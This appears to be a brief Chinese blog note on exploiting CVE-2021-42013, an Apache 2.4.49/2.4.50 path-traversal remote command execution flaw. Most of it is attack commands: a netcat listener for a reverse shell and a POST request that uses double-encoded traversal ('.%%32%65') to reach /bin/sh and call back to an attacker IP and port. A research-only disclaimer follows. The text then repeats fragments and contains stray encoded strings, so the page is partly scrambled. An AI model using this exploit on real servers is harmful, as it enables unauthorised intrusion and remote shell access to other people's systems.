【笔记】CVE-2021-42013漏洞利用
前言
Apache的远程命令执行漏洞利用
漏洞利用前提
- Apache版本
2.4.49、2.4.50 - 受害者有perl环境
漏洞利用
攻击者监听反弹Shell
1 | nc -lvp <port> |
受害者反弹Shell
<ip>:攻击者IP地址<port>:攻击者端口号
1 | POST http://127.0.0.1:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
Apache的远程命令执行漏洞利用
2.4.49、2.4.501 | nc -lvp <port> |
<ip>:攻击者IP地址<port>:攻击者端口号
1 | POST http://127.0.0.1:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh |